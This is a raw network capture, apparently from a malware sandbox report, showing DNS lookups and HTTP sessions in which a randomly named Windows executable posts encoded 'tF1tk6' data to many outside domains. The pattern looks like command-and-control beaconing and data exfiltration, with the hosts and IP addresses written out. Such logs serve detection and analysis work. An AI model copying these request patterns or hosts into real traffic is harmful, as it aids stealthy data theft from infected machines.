                                                                            Jun 19, 2024 22:41:35.131256104 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:35.132047892 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:35.132114887 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:35.256942034 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:35.272150040 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.272231102 CEST4978780192.168.2.4202.95.21.152
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                            Jun 19, 2024 22:38:42.904519081 CEST1.1.1.1192.168.2.40x107aName error (3)www.fr2e4o.cfdnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:38:48.008794069 CEST1.1.1.1192.168.2.40xc530No error (0)www.futuregainers.netfuturegainers.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:38:48.008794069 CEST1.1.1.1192.168.2.40xc530No error (0)futuregainers.net195.35.39.119A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:03.959182978 CEST1.1.1.1192.168.2.40xe42fNo error (0)www.shopnow321.onlineshopnow321.onlineCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:03.959182978 CEST1.1.1.1192.168.2.40xe42fNo error (0)shopnow321.online162.241.2.254A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.193A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.65.148.19A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.77A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.192A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:30.864660025 CEST1.1.1.1192.168.2.40x26c1No error (0)www.shahaf3d.comshahaf3d.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:30.864660025 CEST1.1.1.1192.168.2.40x26c1No error (0)shahaf3d.com64.46.118.35A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)www.againbeautywhiteskin.asiadns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:59.760977983 CEST1.1.1.1192.168.2.40x448bName error (3)www.homeppower.comnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:07.837901115 CEST1.1.1.1192.168.2.40xeeecNo error (0)www.lenovest.xyz162.0.213.94A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:21.440279007 CEST1.1.1.1192.168.2.40x8f49No error (0)www.931951.com172.82.177.221A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:35.170115948 CEST1.1.1.1192.168.2.40x8dd8No error (0)www.srripaspocon.orgsrripaspocon.orgCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:35.170115948 CEST1.1.1.1192.168.2.40x8dd8No error (0)srripaspocon.org15.204.0.108A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:48.396576881 CEST1.1.1.1192.168.2.40xdfedName error (3)www.x5hh186z.skinnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:56.606955051 CEST1.1.1.1192.168.2.40xb9d9No error (0)www.torentreprenad.com194.9.94.86A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:56.606955051 CEST1.1.1.1192.168.2.40xb9d9No error (0)www.torentreprenad.com194.9.94.85A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:09.938782930 CEST1.1.1.1192.168.2.40x9f8bNo error (0)www.grecanici.com35.214.235.206A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:13.715215921 CEST1.1.1.1192.168.2.40x13eaNo error (0)www.ndhockeyprospects.comndhockeyprospects.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:13.715215921 CEST1.1.1.1192.168.2.40x13eaNo error (0)ndhockeyprospects.com162.241.253.174A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:23.408807993 CEST1.1.1.1192.168.2.40x560dName error (3)www.navigate-power.boatsnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:30.182910919 CEST1.1.1.1192.168.2.40xe0f1No error (0)www.qmancha.com202.95.21.152A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:31.762448072 CEST1.1.1.1192.168.2.40xb1e9No error (0)www.93v0.com18.178.206.118A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:43.852456093 CEST1.1.1.1192.168.2.40xf700Server failure (2)www.cloud-force.clubnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:45.462038994 CEST1.1.1.1192.168.2.40xf6eeNo error (0)www.leadchanges.info66.96.162.149A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:51.941255093 CEST1.1.1.1192.168.2.40x5b38No error (0)www.zonenail.info66.29.145.248A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:02.099236965 CEST1.1.1.1192.168.2.40x135cName error (3)www.fr2e4o.cfdnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:05.743613005 CEST1.1.1.1192.168.2.40x6b10No error (0)www.okbharat.best188.114.97.3A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:05.743613005 CEST1.1.1.1192.168.2.40x6b10No error (0)www.okbharat.best188.114.96.3A (IP address)IN (0x0001)false
                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            0 | 192.168.2.4 | 49743 | 195.35.39.119 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:38:48.022805929 CEST | 436 | OUT | GET /l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:38:48.575244904 CEST | 1219 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:38:48 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            1 | 192.168.2.4 | 49745 | 162.241.2.254 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:03.970093012 CEST | 705 | OUT | POST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1cqWdP6IKkWC4W/qDLKZBZlq96wfVDHjmZQ==
                                                                            Jun 19, 2024 22:39:04.568567038 CEST | 1121 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:04 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            2 | 192.168.2.4 | 49746 | 162.241.2.254 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:06.525913000 CEST | 725 | OUT | POST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60EvjoYUfmLcBORLzrvRBE7zTtcuKhUlPzcxTFYkSbCeLhcyQiWEBLu4PKxZQJtLX5BlucHX9epF82p4U5ce3SZrBHQCz8zAfu48DkM4ZjKYnsl6BNHitgnYviWPb/mdHo4eiWGOX57Za74WLlOOn3WhOEevCWl/k95ZJKQVD9bjGaw3Qho=
                                                                            Jun 19, 2024 22:39:07.024255991 CEST | 1121 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:06 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.4 | 49747 | 162.241.2.254 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:09.080625057 CEST | 10807 | OUT | POST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:09.563412905 CEST | 1121 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:09 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.4 | 49748 | 162.241.2.254 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:11.624327898 CEST | 436 | OUT | GET /41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ= HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:12.113123894 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:12 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 2361
                                                                            Vary: Accept-Encoding
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                                                                            Jun 19, 2024 22:39:12.113171101 CEST | 1236 | IN |
                                                                            Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/
                                                                            Jun 19, 2024 22:39:12.113198996 CEST | 151 | IN |
                                                                            Data Ascii: -sys/images/illustration-404.svg" class="hidden-xs img-responsive " alt="illustration"> </div> </div> </div> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.4 | 49749 | 185.137.235.193 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:17.228084087 CEST | 690 | OUT | POST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=V8EXo2f8tZ1yuNdpHf0eL0J//4iRD1cwLwyfnTTFyTUB76Chu+8UoP/S9qX7QOA8b0ejBC+7i1/fVGBXYzczlBrkqNVbyiCLsLqdWlscVUsOvf+qSxptSHciY0dnpk992bcRCr3XWdr8xuAWS9sHIkJ2nfQDu3eQtSle6azohwpwx9ge2OPzYNeLaw1h5a6SIw==
                                                                            Jun 19, 2024 22:39:18.080679893 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:17 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=fe8e078d9bbe58d91a5515d3e9c8cd8e; expires=Sat, 20-Jul-2024 20:39:17 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:17 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 05
                                                                            Content-Encoding: gzip
                                                                            Jun 19, 2024 22:39:18.080732107 CEST | 766 | IN | (continuation of the gzip-compressed response body)


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.4 | 49750 | 185.137.235.193 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:19.761338949 CEST | 710 | OUT | POST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvylkB7Yaht/8UvP/S6aW/duA3b0arBG67i17fVHxXbCc0kRriitVFsSCLsLqdWlo2VU0OvvOqd0duRHctIEdnj0822bcJCq7pWfT8xvwWSssECkJwo/RAhkP5qisX8Kb/nzhb07xEn/ukKN64H38V0ZHbT9WBCrgGB1K1SlZu9Hu4Y3Y=
                                                                            Jun 19, 2024 22:39:20.544374943 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=ba32b58021643d0af7ea5f5cbc056f48; expires=Sat, 20-Jul-2024 20:39:20 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:20 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 11
                                                                            Content-Encoding: gzip
                                                                            Jun 19, 2024 22:39:20.544557095 CEST | 766 | IN | (continuation of the gzip-compressed response body)


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.4 | 49751 | 185.137.235.193 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:22.296168089 CEST | 10792 | OUT | POST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6= [TRUNCATED]
                                                                            Jun 19, 2024 22:39:23.335171938 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:23 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=1dc14ae36478ab420e0742cd783d1fc2; expires=Sat, 20-Jul-2024 20:39:23 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:23 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 38
                                                                            Content-Encoding: gzip
                                                                            Jun 19, 2024 22:39:23.335378885 CEST | 766 | IN | (continuation of the gzip-compressed response body)


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.4 | 49752 | 185.137.235.193 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:24.826581001 CEST | 431 | OUT | GET /4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:25.576443911 CEST | 392 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:25 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://klimkina.pro/4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV
                                                                            X-XSS-Protection: 1
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            9 | 192.168.2.4 | 49753 | 64.46.118.35 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:30.874202967 CEST | 690 | OUT | POST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=Y+MoCjqFkfVpi3IxJFc5J+PiHLUvi0s0M1GYn7//PDLA5p0vsjHkUFmlotcG6OQF0BaVhcnqKEQaA8aOgF++VA4D/80NCV7BCWktlEMKpjPN36lq5B/1ntdY0ZkVcHxx0oBOU3c8dep6ftW8N4l31wNPX8wDZSf8TpklLbT1TRPb9CY5Z3X7eaHICZSwHdfvEQ==
                                                                            Jun 19, 2024 22:39:32.109441996 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:32 GMT
                                                                            server: LiteSpeed
                                                                            Jun 19, 2024 22:39:32.109575987 CEST | 1236 | IN | (continuation of the Brotli-compressed response body)
                                                                            Jun 19, 2024 22:39:32.109616041 CEST | 1041 | IN | (continuation of the Brotli-compressed response body)
                                                                            Jun 19, 2024 22:39:32.110479116 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            10 | 192.168.2.4 | 49754 | 64.46.118.35 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
